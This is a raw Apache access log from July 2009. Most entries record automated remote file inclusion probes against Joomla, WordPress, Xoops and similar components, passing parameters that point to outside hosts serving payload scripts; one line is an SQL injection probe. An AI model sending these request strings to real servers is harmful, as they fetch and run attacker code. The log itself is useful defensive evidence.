89.149.194.189 - - [28/Jul/2009:06:01:13 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jul/2009:06:01:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.194.189 - - [28/Jul/2009:06:01:53 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
66.98.134.54 - - [28/Jul/2009:06:02:26 -0400] "GET /logs/access_log.Q109051800%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:02:26 -0400] "GET /logs/access_log.Q109061600%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:03:30 -0400] "GET /logs/access_log.Q109051800%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:03:30 -0400] "GET /logs/access_log.Q109061600%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:03:45 -0400] "GET /logs/access_log.Q109051800%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:06:03:45 -0400] "GET /logs/access_log.Q109061600%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.80.241.115 - - [28/Jul/2009:06:04:29 -0400] "GET //stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.80.241.115 - - [28/Jul/2009:06:04:29 -0400] "GET /logs//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.80.241.115 - - [28/Jul/2009:06:04:29 -0400] "GET /logs/access_log.Q109061600//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.80.241.115 - - [28/Jul/2009:06:04:29 -0400] "GET /logs/access_log.Q109051800//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [28/Jul/2009:06:06:26 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.221.130.27 - - [28/Jul/2009:06:06:30 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.27 - - [28/Jul/2009:06:06:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 11334 "-" "Mozilla/5.0"
77.221.130.27 - - [28/Jul/2009:06:06:31 -0400] "GET /logs/access_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:06:07:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.206.123.139 - - [28/Jul/2009:06:07:19 -0400] "GET /index2.php?id=' HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
77.221.130.27 - - [28/Jul/2009:06:08:52 -0400] "GET /logs/access_log.Q109052800%20%20/?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.27 - - [28/Jul/2009:06:08:53 -0400] "GET /logs/access_log.Q109051300%20%20/?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.149.194.189 - - [28/Jul/2009:06:09:15 -0400] "GET /logs/access_log.Q109070300//config/dbutil.bck.php?confdir=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
89.149.194.189 - - [28/Jul/2009:06:09:15 -0400] "GET //config/dbutil.bck.php?confdir=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
89.149.194.189 - - [28/Jul/2009:06:09:16 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jul/2009:06:12:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.194.189 - - [28/Jul/2009:06:12:25 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
72.32.58.230 - - [28/Jul/2009:06:14:43 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.32.58.230 - - [28/Jul/2009:06:14:43 -0400] "GET /logs/access_log.Q109051800/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.32.58.230 - - [28/Jul/2009:06:14:43 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 11334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.133.240.90 - - [28/Jul/2009:06:14:45 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 248 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:06:14:45 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 253 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:06:14:45 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825"
211.133.240.90 - - [28/Jul/2009:06:14:53 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nascarbrasil.com/imagens/html.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825"
72.32.58.230 - - [28/Jul/2009:06:15:30 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
89.149.194.189 - - [28/Jul/2009:06:15:38 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
89.149.194.189 - - [28/Jul/2009:06:15:38 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
89.149.194.189 - - [28/Jul/2009:06:15:39 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jul/2009:06:17:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [28/Jul/2009:06:17:34 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.140.20.212 - - [28/Jul/2009:06:17:37 -0400] "GET /logs/access_log.Q109062000/?API_HOME_DIR=http://paulowtf.webs.com/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.76"
213.140.20.212 - - [28/Jul/2009:06:18:09 -0400] "GET /logs/access_log.Q109062000/?API_HOME_DIR=http://box.dmon.com/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.76"
213.140.20.212 - - [28/Jul/2009:06:18:09 -0400] "GET /?API_HOME_DIR=http://box.dmon.com/id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.76"
123.125.66.24 - - [28/Jul/2009:06:18:12 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.140.20.212 - - [28/Jul/2009:06:18:14 -0400] "GET /logs/?API_HOME_DIR=http://box.dmon.com/id.txt? HTTP/1.1" 200 11334 "-" "libwww-perl/5.76"
90.156.153.205 - - [28/Jul/2009:06:18:51 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
90.156.153.205 - - [28/Jul/2009:06:18:51 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
90.156.153.205 - - [28/Jul/2009:06:18:51 -0400] "GET /logs/access_log.Q109071400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
90.156.153.205 - - [28/Jul/2009:06:18:51 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:19:27 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:19:27 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:19:28 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:46 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:46 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:46 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:57 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:57 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:19:57 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:20:09 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:20:10 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:20:14 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:06:20:35 -0400] "GET /logs/error_log.Q109051800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.140.20.212 - - [28/Jul/2009:06:21:22 -0400] "GET /logs/error_log.Q109062000/?API_HOME_DIR=http://box.dmon.com/id.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
89.149.194.189 - - [28/Jul/2009:06:21:25 -0400] "GET /logs/access_log.Q109071000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://impeel.com/impeel/web/css/r_jpg.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
221.143.51.115 - - [28/Jul/2009:06:21:43 -0400] "GET /http://intranet.esc-clermont.fr/components/com_graccess/idx?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jul/2009:06:22:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
90.156.153.205 - - [28/Jul/2009:06:22:24 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
90.156.153.205 - - [28/Jul/2009:06:22:24 -0400] "GET /logs/access_log.Q109071400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
213.140.20.212 - - [28/Jul/2009:06:22:49 -0400] "GET /logs/error_log.Q109062000/?API_HOME_DIR=http://paulowtf.webs.com/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
200.80.241.115 - - [28/Jul/2009:06:22:49 -0400] "GET /logs/access_log.Q109051800%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.80.241.115 - - [28/Jul/2009:06:22:49 -0400] "GET /logs/access_log.Q109061600%20%20//stats////?_SERVER[DOCUMENT_ROOT]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:23:09 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:06:23:29 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.118.90.151 - - [28/Jul/2009:06:24:37 -0400] "GET /logs/access_log.Q109051800/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.118.90.151 - - [28/Jul/2009:06:24:37 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.118.90.151 - - [28/Jul/2009:06:24:37 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 11334 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
212.156.76.70 - - [28/Jul/2009:06:25:10 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.156.76.70 - - [28/Jul/2009:06:25:10 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.156.76.70 - - [28/Jul/2009:06:25:10 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.156.76.70 - - [28/Jul/2009:06:25:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
87.118.90.151 - - [28/Jul/2009:06:25:41 -0400] "GET /logs/access_log.Q109051300/?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.46.48.194 - - [28/Jul/2009:06:25:59 -0400] "GET /cgi-bin/lansaweb HTTP/1.1" 408 514 "-" "Mozilla/4.0"
209.59.12.99 - - [28/Jul/2009:06:27:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.217.43.194 - - [28/Jul/2009:06:27:22 -0400] "GET /logs/error_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.565.cn/images/feelcomzid.txt????? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
82.217.43.194 - - [28/Jul/2009:06:27:22 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.565.cn/images/feelcomzid.txt????? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
82.217.43.194 - - [28/Jul/2009:06:27:22 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.565.cn/images/feelcomzid.txt????? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
82.217.43.194 - - [28/Jul/2009:06:27:38 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.565.cn/images/feelcomzid.txt????? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
117.110.74.195 - - [28/Jul/2009:06:29:26 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:06:29:26 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:06:29:26 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:06:30:46 -0400] "GET /logs/access_log.Q109061300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.139.129 - - [28/Jul/2009:06:30:55 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:06:30:55 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:06:30:55 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:06:31:51 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:06:32:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.105.230 - - [28/Jul/2009:06:33:41 -0400] "GET /logs/error_log.Q108061200 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
124.0.139.129 - - [28/Jul/2009:06:33:45 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jul/2009:06:34:04 -0400] "GET /images/over-index6_surmask.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
203.130.198.40 - - [28/Jul/2009:06:34:22 -0400] "GET /logs/access_log.Q109060600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:34:22 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:34:22 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:34:45 -0400] "GET /logs/access_log.Q109060600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:34:45 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:34:46 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
203.130.198.40 - - [28/Jul/2009:06:35:16 -0400] "GET /logs/access_log.Q109070300/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
190.144.44.36 - - [28/Jul/2009:06:35:29 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:35:38 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:06:35:40 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:06:35:45 -0400] "GET /logs/access_log.Q109070300/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
190.144.44.36 - - [28/Jul/2009:06:35:50 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jigfish.com/oneadmin/photogallery//id1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
217.174.254.143 - - [28/Jul/2009:06:35:53 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.822"
217.174.254.143 - - [28/Jul/2009:06:35:58 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.822"
217.174.254.143 - - [28/Jul/2009:06:35:58 -0400] "GET /logs/access_log.Q109051900/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.822"
209.59.12.99 - - [28/Jul/2009:06:37:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.174.254.143 - - [28/Jul/2009:06:37:32 -0400] "GET /logs/access_log.Q109060600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.churchyardsale.com/yes.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.822"
218.237.66.229 - - [28/Jul/2009:06:39:00 -0400] "GET //////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
218.237.66.229 - - [28/Jul/2009:06:39:00 -0400] "GET /logs/access_log.Q109051000//////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.237.66.229 - - [28/Jul/2009:06:39:00 -0400] "GET /logs/access_log.Q109052700//////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.237.66.229 - - [28/Jul/2009:06:39:00 -0400] "GET /logs//////?mosConfig_absolute_path=http://assess.vet.cmu.ac.th/m1.gif??? HTTP/1.1" 200 11343 "-" "Mozilla/5.0"
172.16.1.180 - - [28/Jul/2009:06:39:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:39:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Jul/2009:06:39:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [28/Jul/2009:06:42:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
